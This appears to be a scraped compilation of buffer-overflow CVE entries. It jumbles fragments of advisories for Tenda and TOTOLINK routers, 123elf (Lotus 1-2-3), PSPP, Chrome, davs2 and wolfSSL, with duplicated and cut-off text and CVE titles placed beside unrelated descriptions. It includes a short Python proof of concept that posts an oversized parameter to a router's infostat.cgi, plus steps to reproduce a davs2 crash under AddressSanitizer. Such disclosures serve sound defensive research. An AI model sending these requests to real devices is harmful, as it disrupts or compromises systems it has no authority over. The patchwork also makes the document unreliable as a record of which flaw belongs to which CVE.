In Tenda G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE, the getsinglepppuser function has a buffer overflow caused by sscanf.

Notes:  
1.This firmware is only fit for G3 and its firmware version must be in V15.11.0.XX or more.  
2.Do not power off the device when upgrading.  
3.Please unzip the file you downloaded and use the file ended with "bin" or "trx" to upgrade your device.

Update:

1\. Added DPD in IPSec.  
2\. Added valid period for accounts in Captive Portal.  
3\. Solved issue with statistics are not correct while terminals connected to secondary SSID.  
4\. Solved issue with devices hang when received data with QoS option in VLAN.

**Contact Us:**

CVE-2022-36584: G3V3.0 Firmware-Tenda-All For Better NetWorking

In TOTOLINK A860R V4.1.2cu.5182_B20201027, the parameters in infostat.cgi are not filtered, causing a buffer overflow vulnerability.

Permalink

Cannot retrieve contributors at this time

**Firmware:**

TOTOLINK:A860R V4.1.2cu.5182\_B20201027

http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=62&ids=36

**Detail:**

Parameters in infostat.cgi are not filtered, causing a buffer overflow vulnerability

The fread function copies data directly to the V11 register without filtering, causing a buffer overflow

**poc：**

    import requests
    data = {'a':'a'*0x4000}
    res = requests.post("http://192.168.0.1/cgi-bin/infostat.cgi", data=data)
    print(res.content)

CVE-2022-37842: iot/1.md at main · 1759134370/iot

A stack buffer overflow was reported in the cell format processing routines for 123elf, a project that brings Lotus 1-2-3 to Linux. If a victim opens an untrusted malicious worksheet, code execution could occur.

    # AboutThe 123 command is a spreadsheet application for UNIX-based systems thatcan be used in interactive mode to create and modify financial andscientific models.For more information, see https://123r3.net# AdvisoryA stack buffer overflow was reported in the cell format processingroutines. If a victim opens an untrusted malicious worksheet, codeexecution could occur.There have been no reports of this vulnerability being exploited in the wild.We take your security very seriously, in fact, this is the first knownvulnerability reported in Lotus 1-2-3 R3 since it's release in September1990.# CreditThis issue was reported to the 123elf project by dbastone.# SolutionA new release has been prepared to resolve this issue, we recommendaffected users upgrade immediately.https://github.com/taviso/123elf/Lotus 1-2-3 releases for other platforms are affected, but are notactively maintained. MS-DOS, OS/2, OpenVMS, z/OS and SysV/386 users areadvised to migrate to Linux to continue receiving updates.--  _o)            $ lynx lock.cmpxchg8b.com /\\  _o)  _o)  $ finger taviso@sdf.org_\_V _( ) _( )  @taviso

123elf Project Buffer Overflow

This updated advisory is a follow-up to the advisory update titled ICSA-21-252-02 Delta Electronics DOPSoft2 that was published September 09, 2021, to the ICS webpage on cisa.gov/ics. This advisory contains mitigations for Stack-based Buffer Overflow, Out-of-Bounds Write, and Heap-based Buffer Overflow vulnerabilities in Delta Electronics DOPSoft 2 HMI editing software.

Delta Electronics DOPSoft 2 (Update A)

123elf Lotus 1-2-3 before 1.0.0rc3 for Linux, and Lotus 1-2-3 R3 for UNIX and other platforms through 9.8.2, allow attackers to execute arbitrary code via a crafted worksheet. This occurs because of a stack-based buffer overflow in the cell format processing routines, as demonstrated by a certain function call from process_fmt() that can be reached via a w3r_format element in a wk3 document.

This release fixes a security issue when opening malformed worksheets, see #103.

Please note, we recommend building from source to get the latest bugfixes, but these packages are available as an alternative.

To get acquainted with 1-2-3, try the Getting Started wiki.

> Note: You may need to run dpkg --add-architecture i386 before installing this.

CVE-2022-39843: Release New Release · taviso/123elf

An issue was discovered in PSPP 1.6.2. There is a heap-based buffer overflow at the function read_string in utilities/pspp-dump-sav.c, which allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact.

CVE-2022-39832

An issue was discovered in PSPP 1.6.2. There is a heap-based buffer overflow at the function read_bytes_internal in utilities/pspp-dump-sav.c, which allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact. This issue is different from CVE-2018-20230.

CVE-2022-39831

Google on Friday shipped emergency fixes to address a security vulnerability in the Chrome web browser that it said is being actively exploited in the wild.
The issue, assigned the identifier CVE-2022-3075, concerns a case of insufficient data validating in Mojo, which refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC).
An

Google on Friday shipped emergency fixes to address a security vulnerability in the Chrome web browser that it said is being actively exploited in the wild.

The issue, assigned the identifier **CVE-2022-3075**, concerns a case of insufficient data validating in Mojo, which refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC).

An anonymous researcher has been credited with reporting the high-severity flaw on August 30, 2022.

"Google is aware of reports that an exploit for CVE-2022-3075 exists in the wild," the internet giant said, without delving into additional specifics about the nature of the attacks to prevent additional threat actors from taking advantage of the flaw.

The latest update makes it the sixth zero-day vulnerability in Chrome that Google has resolved since the start of the year -

*   CVE-2022-0609 - Use-after-free in Animation
*   CVE-2022-1096 - Type confusion in V8
*   CVE-2022-1364 - Type confusion in V8
*   CVE-2022-2294 - Heap buffer overflow in WebRTC
*   CVE-2022-2856 - Insufficient validation of untrusted input in Intents

Users are recommended to upgrade to version 105.0.5195.102 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Release Urgent Chrome Update to Patch New Zero-Day Vulnerability

PKUVCL davs2 v1.6.205 was discovered to contain a global buffer overflow via the function parse_sequence_header() at source/common/header.cc:269.

\====================================================================================  
static  
int parse\_sequence\_header(davs2\_mgr\_t \*mgr, davs2\_seq\_t \*seq, davs2\_bs\_t \*bs)  
{  
......

    seq->head.bitrate    = ((seq->bit_rate_upper << 18) + seq->bit_rate_lower) * 400;
    seq->head.frame_rate = FRAME_RATE[seq->head.frame_rate_id - 1];          //   <------ read overflow here
    
    seq->i_enc_width     = ((seq->head.width + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT;
    seq->i_enc_height    = ((seq->head.height   + MIN_CU_SIZE - 1) >> MIN_CU_SIZE_IN_BIT) << MIN_CU_SIZE_IN_BIT;
    seq->valid_flag = 1;
    

\====================================================================================

This is a security issue.

cd /path/to/davs2/build/linux/  
./configure --enable-pic  
vim config.mak (add -fsanitizer=address to CFLAGS, and -fsanitizer=address -lasan to LDFLAGS)  
make  
./davs2 -i /path/to/poc1.avs -o test.yuv

\=================================================================  
\==4112727==ERROR: AddressSanitizer: global-buffer-overflow on address 0x555555956808 at pc 0x5555555a44d0 bp 0x7fffffffc910 sp 0x7fffffffc900  
READ of size 4 at 0x555555956808 thread T0  
#0 0x5555555a44cf in parse\_sequence\_header /root/arayz/davs2/source/common/header.cc:269  
#1 0x5555555b1ffb in davs2\_parse\_header /root/arayz/davs2/source/common/header.cc:1517  
#2 0x555555572af9 in decoder\_decode\_es\_unit(davs2\_mgr\_t\*, es\_unit\_t\*) /root/arayz/davs2/source/common/davs2.cc:600  
#3 0x555555573617 in davs2\_decoder\_send\_packet /root/arayz/davs2/source/common/davs2.cc:676  
#4 0x5555555703b3 in test\_decoder /root/arayz/davs2/source/test/test.c:231  
#5 0x555555564fdf in main /root/arayz/davs2/source/test/test.c:329  
#6 0x7ffff7096d8f in \_\_libc\_start\_call\_main ../sysdeps/nptl/libc\_start\_call\_main.h:58  
#7 0x7ffff7096e3f in \_\_libc\_start\_main\_impl ../csu/libc-start.c:392  
#8 0x5555555663d4 in \_start (/root/arayz/davs2/build/linux/davs2+0x123d4)

0x555555956808 is located 24 bytes to the left of global variable 'BETA\_TABLE' defined in '/root/arayz/davs2/source/common/header.cc:69:22' (0x555555956820) of size 64  
0x555555956808 is located 8 bytes to the right of global variable 'FRAME\_RATE' defined in '/root/arayz/davs2/source/common/header.cc:121:24' (0x5555559567e0) of size 32  
SUMMARY: AddressSanitizer: global-buffer-overflow /root/arayz/davs2/source/common/header.cc:269 in parse\_sequence\_header  
Shadow bytes around the buggy address:  
0x0aab2ab22cb0: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 06  
0x0aab2ab22cc0: f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 00 00 00 04  
0x0aab2ab22cd0: f9 f9 f9 f9 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9  
0x0aab2ab22ce0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00  
0x0aab2ab22cf0: 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00  
\=>0x0aab2ab22d00: f9\[f9\]f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9  
0x0aab2ab22d10: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00  
0x0aab2ab22d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0aab2ab22d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0aab2ab22d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0aab2ab22d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==4112727==ABORTING

CVE-2022-36647: Global-buffer-overflow in parse_sequence_header() --> source/common/header.cc:269 · Issue #29 · pkuvcl/davs2

wolfSSL through 5.0.0 allows an attacker to cause a denial of service and infinite loop in the client component by sending crafted traffic from a Machine-in-the-Middle (MITM) position. The root cause is that the client module accepts TLS messages that normally are only sent to TLS servers.

Tag

#buffer_overflow